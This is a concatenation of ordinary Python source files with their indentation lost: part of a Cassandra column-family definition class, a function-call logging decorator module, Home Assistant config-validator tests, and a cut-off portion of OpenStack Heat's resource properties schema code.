This constructor accepts a dictionary of column-value pairs from a row
of system.schema_columnfamilies, and a sequence of similar dictionaries
from corresponding rows in system.schema_columns.
"""
cf = cls(name=layout[u'columnfamily_name'])
cf.keyspace = layout[u'keyspace_name']
for attr, val in layout.items():
setattr(cf, attr.encode('ascii'), val)
cf.comparator = lookup_casstype(cf.comparator)
for attr in ('compaction_strategy_options', 'compression_parameters'):
setattr(cf, attr, json.loads(getattr(cf, attr)))
# deal with columns, filter out empty column names (see CASSANDRA-6139)
columns = filter(lambda c: c.name, map(CqlColumnDef.from_layout, coldefs))
partition_key_cols = filter(lambda c: c.component_type == u'partition_key', columns)
partition_key_cols.sort(key=lambda c: c.component_index)
cf.partition_key_columns = map(lambda c: c.name, partition_key_cols)
clustering_key_cols = filter(lambda c: c.component_type == u'clustering_key', columns)
clustering_key_cols.sort(key=lambda c: c.component_index)
cf.clustering_key_columns = map(lambda c: c.name, clustering_key_cols)
cf.primary_key_columns = cf.partition_key_columns + cf.clustering_key_columns
regular_cols = list(set(columns) - set(partition_key_cols) - set(clustering_key_cols))
regular_cols.sort(key=lambda c: c.name)
cf.regular_columns = map(lambda c: c.name, regular_cols)
cf.columns = partition_key_cols + clustering_key_cols + regular_cols
return cf
# not perfect, but good enough; please read CFDefinition constructor comments
# returns False if we are dealing with a CQL3 table, True otherwise.
# 'compact' here means 'needs WITH COMPACT STORAGE option for CREATE TABLE in CQL3'.
def is_compact_storage(self):
if not issubclass(self.comparator, CompositeType):
return True
for subtype in self.comparator.subtypes:
if issubclass(subtype, ColumnToCollectionType):
return False
if len(self.clustering_key_columns) == len(self.comparator.subtypes) - 1:
if self.comparator.subtypes[-1] is UTF8Type:
return False
return True
def is_counter_col(self, colname):
try:
return bool(self.get_column(colname).cqltype is CounterColumnType)
except KeyError:
return False
def get_column(self, colname):
col_info = [cm for cm in self.columns if cm.name == colname]
if not col_info:
raise KeyError("column %r not found" % (colname,))
return col_info[0]
def __str__(self):
return '<%s %s.%s>' % (self.__class__.__name__, self.keyspace, self.name)
__repr__ = __str__
| |
#!/usr/bin/env python
# coding=utf-8
import re
import inspect
import types
import log
# key: function, value: boolean -- has return statement?
__has_return_statement = {}
def __function_has_return_statement(function):
"""Helper function, checks if a function given as a parameter
has a return statement. Returns boolean."""
if function not in __has_return_statement:
pattern = re.compile(r'(^| |:)return($| |\()')
found = filter(pattern.findall, inspect.getsource(function).split('\n'))
__has_return_statement[function] = len(found) > 0
return __has_return_statement[function]
def __get_function_parameters(function, *args, **kwargs):
"""Helper function, returns a dictionary containing function
parameter names and values."""
# Get names and default arguments
fargspec = inspect.getargspec(function)
if fargspec.defaults:
arglist = dict([(name, default)
for name, default
in zip(fargspec.args, fargspec.defaults)])
else:
arglist = dict([(name, None) for name in fargspec.args])
# Get argument values passed to the function
unnamed = []
if args:
for i, value in enumerate(args):
try:
arglist[fargspec.args[i]] = value
except IndexError:
unnamed.append(value)
if kwargs:
for name, value in kwargs.items():
arglist[name] = value
# Create final list of all arguments and their values
farglist = []
for name, value in arglist.items():
farglist.append((name, value,))
for value in unnamed:
farglist.append(('?', value,))
return farglist
def __format_value(value):
if isinstance(value, basestring):
value = re.sub(r'\r\n', ' ', value)
value = re.sub(r'\n', ' ', value)
value = "'%s'" % value
return value
def footprint(function):
"""Decorator logging function's params and return value."""
# Make sure that passed argument is a function
assert inspect.isfunction(function), 'Cannot decorate: not a function!'
def function_wrapper(*args, **kwargs):
# Get function arguments and their values
farglist = __get_function_parameters(function, *args, **kwargs)
# Print the header: what function was called
# and what argument values were passed
fargdict = dict(farglist)
if 'self' in fargdict:
call_str = 'CALL %s.%s.%s (' % (function.__module__,
fargdict['self'].__class__.__name__,
function.__name__)
elif 'cls' in fargdict:
call_str = 'CALL %s.%s.%s (' % (function.__module__,
fargdict['cls'].__name__,
function.__name__)
else:
call_str = 'CALL %s.%s (' % (function.__module__,
function.__name__)
if not farglist:
log.info('%s)' % call_str)
elif len(farglist) == 1:
log.info('%s%s = %s)' % (call_str,
farglist[0][0],
__format_value(farglist[0][1])))
else:
indent = ' ' * len(call_str)
# First parameter
log.info('%s%s = %s' % (call_str,
farglist[0][0],
__format_value(farglist[0][1])))
# [1:-1] parameters
for name, value in farglist[1:-1]:
log.info('%s%s = %s' % (indent, name,
__format_value(value)))
# Last parameters
log.info('%s%s = %s)' % (indent,
farglist[-1][0],
__format_value(farglist[-1][1])))
log.indent()
# Invoke the functions
result = function(*args, **kwargs)
# Print footer and the return value (if present)
if __function_has_return_statement(function):
log.info('END %s -> %s' % (function.__name__,
__format_value(result)))
else:
log.info('END %s' % function.__name__)
log.unindent()
# Return function result
return result
return function_wrapper
def assert_not_none(function):
"""Decorator asserting a function's return value is not None."""
def function_wrapper(*args, **kwargs):
result = function(*args, **kwargs)
assert result is not None, 'Function %s output is None!' % function.__name__
return result
return function_wrapper
# Auto decoration flag
DO_NOT_DECORATE_FLAG = '__do_not_decorate'
def disable_auto_decoration(function):
"""Set a DO_NOT_DECORATE flag to a function."""
setattr(function, DO_NOT_DECORATE_FLAG, True)
return function
def auto_decoration_enabled(function):
"""Check if auto-decoration is not disabled for a function."""
return inspect.isfunction(function) and not hasattr(function, DO_NOT_DECORATE_FLAG)
class _DecorateAllMethods(type):
"""Metaclass decorating all methods within a class that's using it."""
_decorator_name = None
_disable = []
def __new__(mcs, name, bases, local):
assert mcs._decorator_name in globals()
decorator = globals()[mcs._decorator_name]
for attr_name, attr_value in local.items():
if attr_name in mcs._disable:
continue
if not auto_decoration_enabled(attr_value):
continue
local[attr_name] = decorator(attr_value)
return super(_DecorateAllMethods, mcs).__new__(mcs, name, bases, local)
class FootprintAllMethods(_DecorateAllMethods):
"""Metaclass decorating all methods with a footprint decorator."""
_decorator_name = 'footprint'
_disable = ['__repr__', '__str__']
#def register_footprint(global_items):
# """Highly experimental."""
#
# for name, value in global_items.items():
# if isinstance(value, types.FunctionType):
# print '%s is a function type' % name
class footprintcls(object):
"""A decorator for classes. In case your class has already a metaclass."""
def __init__(self, decorator=None):
self.decorator = decorator or footprint
def __call__(self, cls):
for attr_name, attr_value in cls.__dict__.items():
if attr_name in FootprintAllMethods._disable:
continue
if not auto_decoration_enabled(attr_value):
continue
setattr(cls, attr_name, self.decorator(attr_value))
return cls
| |
"""Test config validators."""
from collections import OrderedDict
from datetime import timedelta, datetime, date
import enum
import os
from socket import _GLOBAL_DEFAULT_TIMEOUT
from unittest.mock import Mock, patch
import pytest
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from tests.common import get_test_home_assistant
def test_boolean():
"""Test boolean validation."""
schema = vol.Schema(cv.boolean)
for value in ('T', 'negative', 'lock'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('true', 'On', '1', 'YES', 'enable', 1, True):
assert schema(value)
for value in ('false', 'Off', '0', 'NO', 'disable', 0, False):
assert not schema(value)
def test_latitude():
"""Test latitude validation."""
schema = vol.Schema(cv.latitude)
for value in ('invalid', None, -91, 91, '-91', '91', '123.01A'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('-89', 89, '12.34'):
schema(value)
def test_longitude():
"""Test longitude validation."""
schema = vol.Schema(cv.longitude)
for value in ('invalid', None, -181, 181, '-181', '181', '123.01A'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('-179', 179, '12.34'):
schema(value)
def test_port():
"""Test TCP/UDP network port."""
schema = vol.Schema(cv.port)
for value in ('invalid', None, -1, 0, 80000, '81000'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('1000', 21, 24574):
schema(value)
def test_isfile():
"""Validate that the value is an existing file."""
schema = vol.Schema(cv.isfile)
fake_file = 'this-file-does-not.exist'
assert not os.path.isfile(fake_file)
for value in ('invalid', None, -1, 0, 80000, fake_file):
with pytest.raises(vol.Invalid):
schema(value)
# patching methods that allow us to fake a file existing
# with write access
with patch('os.path.isfile', Mock(return_value=True)), \
patch('os.access', Mock(return_value=True)):
schema('test.txt')
def test_url():
"""Test URL."""
schema = vol.Schema(cv.url)
for value in ('invalid', None, 100, 'htp://ha.io', 'http//ha.io',
'http://??,**', 'https://??,**'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ('http://localhost', 'https://localhost/test/index.html',
'http://home-assistant.io', 'http://home-assistant.io/test/',
'https://community.home-assistant.io/'):
assert schema(value)
def test_platform_config():
"""Test platform config validation."""
options = (
{},
{'hello': 'world'},
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
cv.PLATFORM_SCHEMA(value)
options = (
{'platform': 'mqtt'},
{'platform': 'mqtt', 'beer': 'yes'},
)
for value in options:
cv.PLATFORM_SCHEMA(value)
def test_ensure_list():
"""Test ensure_list."""
schema = vol.Schema(cv.ensure_list)
assert [] == schema(None)
assert [1] == schema(1)
assert [1] == schema([1])
assert ['1'] == schema('1')
assert ['1'] == schema(['1'])
assert [{'1': '2'}] == schema({'1': '2'})
def test_entity_id():
"""Test entity ID validation."""
schema = vol.Schema(cv.entity_id)
with pytest.raises(vol.MultipleInvalid):
schema('invalid_entity')
assert schema('sensor.LIGHT') == 'sensor.light'
def test_entity_ids():
"""Test entity ID validation."""
schema = vol.Schema(cv.entity_ids)
options = (
'invalid_entity',
'sensor.light,sensor_invalid',
['invalid_entity'],
['sensor.light', 'sensor_invalid'],
['sensor.light,sensor_invalid'],
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
[],
['sensor.light'],
'sensor.light'
)
for value in options:
schema(value)
assert schema('sensor.LIGHT, light.kitchen ') == [
'sensor.light', 'light.kitchen'
]
def test_event_schema():
"""Test event_schema validation."""
options = (
{}, None,
{
'event_data': {},
},
{
'event': 'state_changed',
'event_data': 1,
},
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
cv.EVENT_SCHEMA(value)
options = (
{'event': 'state_changed'},
{'event': 'state_changed', 'event_data': {'hello': 'world'}},
)
for value in options:
cv.EVENT_SCHEMA(value)
def test_platform_validator():
"""Test platform validation."""
hass = None
try:
hass = get_test_home_assistant()
schema = vol.Schema(cv.platform_validator('light'))
with pytest.raises(vol.MultipleInvalid):
schema('platform_that_does_not_exist')
schema('hue')
finally:
if hass is not None:
hass.stop()
def test_icon():
"""Test icon validation."""
schema = vol.Schema(cv.icon)
for value in (False, 'work', 'icon:work'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
schema('mdi:work')
def test_time_period():
"""Test time_period validation."""
schema = vol.Schema(cv.time_period)
options = (
None, '', 'hello:world', '12:', '12:34:56:78',
{}, {'wrong_key': -10}
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
'8:20', '23:59', '-8:20', '-23:59:59', '-48:00', {'minutes': 5}, 1, '5'
)
for value in options:
schema(value)
assert timedelta(seconds=180) == schema('180')
assert timedelta(hours=23, minutes=59) == schema('23:59')
assert -1 * timedelta(hours=1, minutes=15) == schema('-1:15')
def test_service():
"""Test service validation."""
schema = vol.Schema(cv.service)
with pytest.raises(vol.MultipleInvalid):
schema('invalid_turn_on')
schema('homeassistant.turn_on')
def test_service_schema():
"""Test service_schema validation."""
options = (
{}, None,
{
'service': 'homeassistant.turn_on',
'service_template': 'homeassistant.turn_on'
},
{
'data': {'entity_id': 'light.kitchen'},
},
{
'service': 'homeassistant.turn_on',
'data': None
},
{
'service': 'homeassistant.turn_on',
'data_template': {
'brightness': '{{ no_end'
}
},
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
cv.SERVICE_SCHEMA(value)
options = (
{'service': 'homeassistant.turn_on'},
{
'service': 'homeassistant.turn_on',
'entity_id': 'light.kitchen',
},
{
'service': 'homeassistant.turn_on',
'entity_id': ['light.kitchen', 'light.ceiling'],
},
)
for value in options:
cv.SERVICE_SCHEMA(value)
def test_slug():
"""Test slug validation."""
schema = vol.Schema(cv.slug)
for value in (None, 'hello world'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in (12345, 'hello'):
schema(value)
def test_string():
"""Test string validation."""
schema = vol.Schema(cv.string)
with pytest.raises(vol.MultipleInvalid):
schema(None)
for value in (True, 1, 'hello'):
schema(value)
def test_temperature_unit():
"""Test temperature unit validation."""
schema = vol.Schema(cv.temperature_unit)
with pytest.raises(vol.MultipleInvalid):
schema('K')
schema('C')
schema('F')
def test_x10_address():
"""Test x10 addr validator."""
schema = vol.Schema(cv.x10_address)
with pytest.raises(vol.Invalid):
schema('Q1')
schema('q55')
schema('garbage_addr')
schema('a1')
schema('C11')
def test_template():
"""Test template validator."""
schema = vol.Schema(cv.template)
for value in (None, '{{ partial_print }', '{% if True %}Hello', ['test']):
with pytest.raises(vol.Invalid,
message='{} not considered invalid'.format(value)):
schema(value)
options = (
1, 'Hello',
'{{ beer }}',
'{% if 1 == 1 %}Hello{% else %}World{% endif %}',
)
for value in options:
schema(value)
def test_template_complex():
"""Test template_complex validator."""
schema = vol.Schema(cv.template_complex)
for value in (None, '{{ partial_print }', '{% if True %}Hello'):
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
1, 'Hello',
'{{ beer }}',
'{% if 1 == 1 %}Hello{% else %}World{% endif %}',
{'test': 1, 'test2': '{{ beer }}'},
['{{ beer }}', 1]
)
for value in options:
schema(value)
def test_time_zone():
"""Test time zone validation."""
schema = vol.Schema(cv.time_zone)
with pytest.raises(vol.MultipleInvalid):
schema('America/Do_Not_Exist')
schema('America/Los_Angeles')
schema('UTC')
def test_datetime():
"""Test date time validation."""
schema = vol.Schema(cv.datetime)
for value in [date.today(), 'Wrong DateTime', '2016-11-23']:
with pytest.raises(vol.MultipleInvalid):
schema(value)
schema(datetime.now())
schema('2016-11-23T18:59:08')
def test_key_dependency():
"""Test key_dependency validator."""
schema = vol.Schema(cv.key_dependency('beer', 'soda'))
options = (
{'beer': None}
)
for value in options:
with pytest.raises(vol.MultipleInvalid):
schema(value)
options = (
{'beer': None, 'soda': None},
{'soda': None}, {}
)
for value in options:
schema(value)
def test_has_at_least_one_key():
"""Test has_at_least_one_key validator."""
schema = vol.Schema(cv.has_at_least_one_key('beer', 'soda'))
for value in (None, [], {}, {'wine': None}):
with pytest.raises(vol.MultipleInvalid):
schema(value)
for value in ({'beer': None}, {'soda': None}):
schema(value)
def test_ordered_dict_order():
"""Test ordered_dict validator."""
schema = vol.Schema(cv.ordered_dict(int, cv.string))
val = OrderedDict()
val['first'] = 1
val['second'] = 2
validated = schema(val)
assert isinstance(validated, OrderedDict)
assert ['first', 'second'] == list(validated.keys())
def test_ordered_dict_key_validator():
"""Test ordered_dict key validator."""
schema = vol.Schema(cv.ordered_dict(cv.match_all, cv.string))
with pytest.raises(vol.Invalid):
schema({None: 1})
schema({'hello': 'world'})
schema = vol.Schema(cv.ordered_dict(cv.match_all, int))
with pytest.raises(vol.Invalid):
schema({'hello': 1})
schema({1: 'works'})
def test_ordered_dict_value_validator(): # pylint: disable=invalid-name
"""Test ordered_dict validator."""
schema = vol.Schema(cv.ordered_dict(cv.string))
with pytest.raises(vol.Invalid):
schema({'hello': None})
schema({'hello': 'world'})
schema = vol.Schema(cv.ordered_dict(int))
with pytest.raises(vol.Invalid):
schema({'hello': 'world'})
schema({'hello': 5})
def test_enum():
"""Test enum validator."""
class TestEnum(enum.Enum):
"""Test enum."""
value1 = "Value 1"
value2 = "Value 2"
schema = vol.Schema(cv.enum(TestEnum))
with pytest.raises(vol.Invalid):
schema('value3')
def test_socket_timeout(): # pylint: disable=invalid-name
"""Test socket timeout validator."""
TEST_CONF_TIMEOUT = 'timeout' # pylint: disable=invalid-name
schema = vol.Schema(
{vol.Required(TEST_CONF_TIMEOUT, default=None): cv.socket_timeout})
with pytest.raises(vol.Invalid):
schema({TEST_CONF_TIMEOUT: 0.0})
with pytest.raises(vol.Invalid):
schema({TEST_CONF_TIMEOUT: -1})
assert _GLOBAL_DEFAULT_TIMEOUT == schema({TEST_CONF_TIMEOUT:
None})[TEST_CONF_TIMEOUT]
assert schema({TEST_CONF_TIMEOUT: 1})[TEST_CONF_TIMEOUT] == 1.0
| |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from oslo_serialization import jsonutils
import six
from heat.common import exception
from heat.common.i18n import _
from heat.engine import constraints as constr
from heat.engine import function
from heat.engine.hot import parameters as hot_param
from heat.engine import parameters
from heat.engine import support
SCHEMA_KEYS = (
REQUIRED, IMPLEMENTED, DEFAULT, TYPE, SCHEMA,
ALLOWED_PATTERN, MIN_VALUE, MAX_VALUE, ALLOWED_VALUES,
MIN_LENGTH, MAX_LENGTH, DESCRIPTION, UPDATE_ALLOWED,
IMMUTABLE,
) = (
'Required', 'Implemented', 'Default', 'Type', 'Schema',
'AllowedPattern', 'MinValue', 'MaxValue', 'AllowedValues',
'MinLength', 'MaxLength', 'Description', 'UpdateAllowed',
'Immutable',
)
class Schema(constr.Schema):
"""
Schema class for validating resource properties.
This class is used for defining schema constraints for resource properties.
It inherits generic validation features from the base Schema class and add
processing that is specific to resource properties.
"""
KEYS = (
TYPE, DESCRIPTION, DEFAULT, SCHEMA, REQUIRED, CONSTRAINTS,
UPDATE_ALLOWED, IMMUTABLE,
) = (
'type', 'description', 'default', 'schema', 'required', 'constraints',
'update_allowed', 'immutable',
)
def __init__(self, data_type, description=None,
default=None, schema=None,
required=False, constraints=None,
implemented=True,
update_allowed=False,
immutable=False,
support_status=support.SupportStatus(),
allow_conversion=False):
super(Schema, self).__init__(data_type, description, default,
schema, required, constraints)
self.implemented = implemented
self.update_allowed = update_allowed
self.immutable = immutable
self.support_status = support_status
self.allow_conversion = allow_conversion
# validate structural correctness of schema itself
self.validate()
@classmethod
def from_legacy(cls, schema_dict):
"""
Return a Property Schema object from a legacy schema dictionary.
"""
# Check for fully-fledged Schema objects
if isinstance(schema_dict, cls):
return schema_dict
unknown = [k for k in schema_dict if k not in SCHEMA_KEYS]
if unknown:
raise exception.InvalidSchemaError(
message=_('Unknown key(s) %s') % unknown)
def constraints():
def get_num(key):
val = schema_dict.get(key)
if val is not None:
val = Schema.str_to_num(val)
return val
if MIN_VALUE in schema_dict or MAX_VALUE in schema_dict:
yield constr.Range(get_num(MIN_VALUE), get_num(MAX_VALUE))
if MIN_LENGTH in schema_dict or MAX_LENGTH in schema_dict:
yield constr.Length(get_num(MIN_LENGTH), get_num(MAX_LENGTH))
if ALLOWED_VALUES in schema_dict:
yield constr.AllowedValues(schema_dict[ALLOWED_VALUES])
if ALLOWED_PATTERN in schema_dict:
yield constr.AllowedPattern(schema_dict[ALLOWED_PATTERN])
try:
data_type = schema_dict[TYPE]
except KeyError:
raise exception.InvalidSchemaError(
message=_('No %s specified') % TYPE)
if SCHEMA in schema_dict:
if data_type == Schema.LIST:
ss = cls.from_legacy(schema_dict[SCHEMA])
elif data_type == Schema.MAP:
schema_dicts = schema_dict[SCHEMA].items()
ss = dict((n, cls.from_legacy(sd)) for n, sd in schema_dicts)
else:
raise exception.InvalidSchemaError(
message=_('%(schema)s supplied for %(type)s %(data)s') %
dict(schema=SCHEMA, type=TYPE, data=data_type))
else:
ss = None
return cls(data_type,
description=schema_dict.get(DESCRIPTION),
default=schema_dict.get(DEFAULT),
schema=ss,
required=schema_dict.get(REQUIRED, False),
constraints=list(constraints()),
implemented=schema_dict.get(IMPLEMENTED, True),
update_allowed=schema_dict.get(UPDATE_ALLOWED, False),
immutable=schema_dict.get(IMMUTABLE, False))
@classmethod
def from_parameter(cls, param):
"""
Return a Property Schema corresponding to a Parameter Schema.
Convert a parameter schema from a provider template to a property
Schema for the corresponding resource facade.
"""
# map param types to property types
param_type_map = {
param.STRING: cls.STRING,
param.NUMBER: cls.NUMBER,
param.LIST: cls.LIST,
param.MAP: cls.MAP,
param.BOOLEAN: cls.BOOLEAN
}
# allow_conversion allows slightly more flexible type conversion
# where property->parameter types don't align, primarily when
# a json parameter value is passed via a Map property, which requires
# some coercion to pass strings or lists (which are both valid for
# Json parameters but not for Map properties).
allow_conversion = param.type == param.MAP
# make update_allowed true by default on TemplateResources
# as the template should deal with this.
return cls(data_type=param_type_map.get(param.type, cls.MAP),
description=param.description,
required=param.required,
constraints=param.constraints,
update_allowed=True,
immutable=False,
allow_conversion=allow_conversion,
default=param.default)
def allowed_param_prop_type(self):
"""
Return allowed type of Property Schema converted from parameter.
Especially, when generating Schema from parameter, Integer Property
Schema will be supplied by Number parameter.
"""
param_type_map = {
self.INTEGER: self.NUMBER,
self.STRING: self.STRING,
self.NUMBER: self.NUMBER,
self.BOOLEAN: self.BOOLEAN,
self.LIST: self.LIST,
self.MAP: self.MAP
}
return param_type_map[self.type]
def __getitem__(self, key):
if key == self.UPDATE_ALLOWED:
return self.update_allowed
elif key == self.IMMUTABLE:
return self.immutable
else:
return super(Schema, self).__getitem__(key)
def schemata(schema_dicts):
"""
Return dictionary of Schema objects for given dictionary of schemata.
The input schemata are converted from the legacy (dictionary-based)
format to Schema objects where necessary.
"""
return dict((n, Schema.from_legacy(s)) for n, s in schema_dicts.items())
class Property(object):
def __init__(self, schema, name=None, context=None):
self.schema = Schema.from_legacy(schema)
self.name = name
self.context = context
def required(self):
return self.schema.required
def implemented(self):
return self.schema.implemented
def update_allowed(self):
return self.schema.update_allowed
def immutable(self):
return self.schema.immutable
def has_default(self):
return self.schema.default is not None
def default(self):
return self.schema.default
def type(self):
return self.schema.type
def support_status(self):
return self.schema.support_status
def _get_integer(self, value):
if value is None:
value = self.has_default() and self.default() or 0
try:
value = int(value)
except ValueError:
raise TypeError(_("Value '%s' is not an integer") % value)
else:
return value
def _get_number(self, value):
if value is None:
value = self.has_default() and self.default() or 0
return Schema.str_to_num(value)
def _get_string(self, value):
if value is None:
value = self.has_default() and self.default() or ''
if not isinstance(value, six.string_types):
if isinstance(value, (bool, int)):
value = six.text_type(value)
else:
raise ValueError(_('Value must be a string'))
return value
def _get_children(self, child_values, keys=None, validate=False):
if self.schema.schema is not None:
if keys is None:
keys = list(self.schema.schema)
schemata = dict((k, self.schema.schema[k]) for k in keys)
properties = Properties(schemata, dict(child_values),
context=self.context)
if validate:
properties.validate()
return ((k, properties[k]) for k in keys)
else:
return child_values
def _get_map(self, value, validate=False):
if value is None:
value = self.has_default() and self.default() or {}
if not isinstance(value, collections.Mapping):
# This is to handle passing Lists via Json parameters exposed
# via a provider resource, in particular lists-of-dicts which
# cannot be handled correctly via comma_delimited_list
if self.schema.allow_conversion:
if isinstance(value, six.string_types):
return value
elif isinstance(value, collections.Sequence):
return jsonutils.dumps(value)
raise TypeError(_('"%s" is not a map') % value)
return dict(self._get_children(six.iteritems(value),
validate=validate))
def _get_list(self, value, validate=False):
if value is None:
value = self.has_default() and self.default() or []
if (not isinstance(value, collections.Sequence) or
isinstance(value, six.string_types)):
raise TypeError(_('"%s" is not a list') % repr(value))
return [v[1] for v in self._get_children(enumerate(value),
range(len(value)),
validate)]
def _get_bool(self, value):
if value is None:
value = self.has_default() and self.default() or False
if isinstance(value, bool):
return value
normalised = value.lower()
if normalised not in ['true', 'false']:
raise ValueError(_('"%s" is not a valid boolean') % normalised)
return normalised == 'true'
def get_value(self, value, validate=False):
"""Get value from raw value and sanitize according to data type."""
t = self.type()
if t == Schema.STRING:
_value = self._get_string(value)
elif t == Schema.INTEGER:
_value = self._get_integer(value)
elif t == Schema.NUMBER:
_value = self._get_number(value)
elif t == Schema.MAP:
_value = self._get_map(value, validate)
elif t == Schema.LIST:
_value = self._get_list(value, validate)
elif t == Schema.BOOLEAN:
_value = self._get_bool(value)
if validate:
self.schema.validate_constraints(_value, self.context)
return _value
class Properties(collections.Mapping):
def __init__(self, schema, data, resolver=lambda d: d, parent_name=None,
context=None, section=None):
self.props = dict((k, Property(s, k, context))
for k, s in schema.items())
self.resolve = resolver
self.data = data
self.error_prefix = []
if parent_name is not None:
self.error_prefix.append(parent_name)
if section is not None:
self.error_prefix.append(section)
self.context = context
@staticmethod
def schema_from_params(params_snippet):
"""
Convert a template snippet that defines parameters
into a properties schema
:param params_snippet: parameter definition from a template
:returns: an equivalent properties schema for the specified params
"""
if params_snippet:
return dict((n, Schema.from_parameter(p)) for n, p
in params_snippet.items())
return {}
def validate(self, with_value=True):
try:
for key in self.data:
if key not in self.props:
msg = _("Unknown Property %s") % key
raise exception.StackValidationFailed(message=msg)
for (key, prop) in self.props.items():
# check that update_allowed and immutable
# do not contradict each other
if prop.update_allowed() and prop.immutable():
msg = _("Property %(prop)s: %(ua)s and %(im)s "
"cannot both be True") % {
'prop': key,
'ua': prop.schema.UPDATE_ALLOWED,
'im': prop.schema.IMMUTABLE}
raise exception.InvalidSchemaError(message=msg)
if with_value:
try:
self._get_property_value(key, validate=True)
except exception.StackValidationFailed as ex:
path = [key]
path.extend(ex.path)
raise exception.StackValidationFailed(
path=path, message=ex.error_message)
except ValueError as e:
if prop.required() and key not in self.data:
path = []
else:
path = [key]
raise exception.StackValidationFailed(
path=path, message=six.text_type(e))
# are there unimplemented Properties
if not prop.implemented() and key in self.data:
msg = _("Property %s not implemented yet") % key
raise exception.StackValidationFailed(message=msg)
except exception.StackValidationFailed as ex:
# NOTE(prazumovsky): should reraise exception for adding specific
# error name and error_prefix to path for correct error message
# building.
path = self.error_prefix
path.extend(ex.path)
raise exception.StackValidationFailed(
error=ex.error or 'Property error',
path=path,
message=ex.error_message
)
def _find_deps_any_in_init(self, unresolved_value):
deps = function.dependencies(unresolved_value)
if any(res.action == res.INIT for res in deps):
return True
def _get_property_value(self, key, validate=False):
if key not in self:
raise KeyError(_('Invalid Property %s') % key)
prop = self.props[key]
if key in self.data:
try:
unresolved_value = self.data[key]
if validate:
if self._find_deps_any_in_init(unresolved_value):
validate = False
value = self.resolve(unresolved_value)
return prop.get_value(value, validate)
# Children can raise StackValidationFailed with unique path which
# is necessary for further use in StackValidationFailed exception.
# So we need to handle this exception in this method.
except exception.StackValidationFailed as e:
raise exception.StackValidationFailed(path=e.path,
message=e.error_message)
# the resolver function could raise any number of exceptions,
# so handle this generically
except Exception as e:
raise ValueError(six.text_type(e))
elif prop.has_default():
return prop.get_value(None, validate)
elif prop.required():
raise ValueError(_('Property %s not assigned') % key)
else:
return None
def __getitem__(self, key):
return self._get_property_value(key)
def __len__(self):
return len(self.props)
def __contains__(self, key):
return key in self.props
def __iter__(self):
return iter(self.props)
@staticmethod
def _param_def_from_prop(schema):
"""
Return a template parameter definition corresponding to a property.
"""
param_type_map = {
schema.INTEGER: parameters.Schema.NUMBER,
schema.STRING: parameters.Schema.STRING,
schema.NUMBER: parameters.Schema.NUMBER,
schema.BOOLEAN: parameters.Schema.BOOLEAN,
schema.MAP: parameters.Schema.MAP,
schema.LIST: parameters.Schema.LIST,
}
def param_items():
yield parameters.TYPE, param_type_map[schema.type]
if schema.description is not None:
yield parameters.DESCRIPTION, schema.description
if schema.default is not None:
yield parameters.DEFAULT, schema.default
for constraint in schema.constraints:
if isinstance(constraint, constr.Length):
if constraint.min is not None:
yield parameters.MIN_LENGTH, constraint.min
if constraint.max is not None:
yield parameters.MAX_LENGTH, constraint.max
elif isinstance(constraint, constr.Range):
if constraint.min is not None:
yield parameters.MIN_VALUE, constraint.min
if constraint.max is not None:
yield parameters.MAX_VALUE, constraint.max
elif isinstance(constraint, constr.AllowedValues):
yield parameters.ALLOWED_VALUES, list(constraint.allowed)
elif isinstance(constraint, constr.AllowedPattern):
yield parameters.ALLOWED_PATTERN, constraint.pattern
if schema.type == schema.BOOLEAN:
yield parameters.ALLOWED_VALUES, ['True', 'true',
'False', 'false']
return dict(param_items())
@staticmethod
def _prop_def_from_prop(name, schema):
"""
Return a provider template property definition for a property.
"""
if schema.type == Schema.LIST:
return {'Fn::Split': [',', {'Ref': name}]}
else:
return {'Ref': name}
@staticmethod
def _hot_param_def_from_prop(schema):
"""
Return parameter definition corresponding to a property for
hot template.
"""
param_type_map = {
schema.INTEGER: hot_param.HOTParamSchema.NUMBER,
schema.STRING: hot_param.HOTParamSchema.STRING,
schema.NUMBER: hot_param.HOTParamSchema.NUMBER,
schema.BOOLEAN: hot_param.HOTParamSchema.BOOLEAN,
schema.MAP: hot_param.HOTParamSchema.MAP,
schema.LIST: hot_param.HOTParamSchema.LIST,
}
def param_items():
yield hot_param.HOTParamSchema.TYPE, param_type_map[schema.type]
if schema.description is not None:
yield hot_param.HOTParamSchema.DESCRIPTION, schema.description
if schema.default is not None:
yield hot_param.HOTParamSchema.DEFAULT, schema.default
for constraint in schema.constraints:
if (isinstance(constraint, constr.Length) or
isinstance(constraint, constr.Range)):
if constraint.min is not None:
yield hot_param.MIN, constraint.min
if constraint.max is not None:
yield hot_param.MAX, constraint.max
elif isinstance(constraint, constr.AllowedValues):
yield hot_param.ALLOWED_VALUES, list(constraint.allowed)
elif isinstance(constraint, constr.AllowedPattern):
yield hot_param.ALLOWED_PATTERN, constraint.pattern
if schema.type == schema.BOOLEAN:
yield hot_param.ALLOWED_VALUES, ['True', 'true',
'False', 'false']
return dict(param_items())
@staticmethod
def _hot_prop_def_from_prop(name, schema):
"""
Return a provider template property definition for a property.
"""
return {'get_param': name}
@classmethod
def schema_to_parameters_and_properties(cls, schema, template_type='cfn'):
"""Generates properties with params resolved for a resource's
properties_schema.
:param schema: A resource type's properties_schema
:returns: A tuple of params and properties dicts
ex: input: {'foo': {'Type': 'List'}}
output: {'foo': {'Type': 'CommaDelimitedList'}},
{'foo': {'Fn::Split': {'Ref': 'foo'}}}
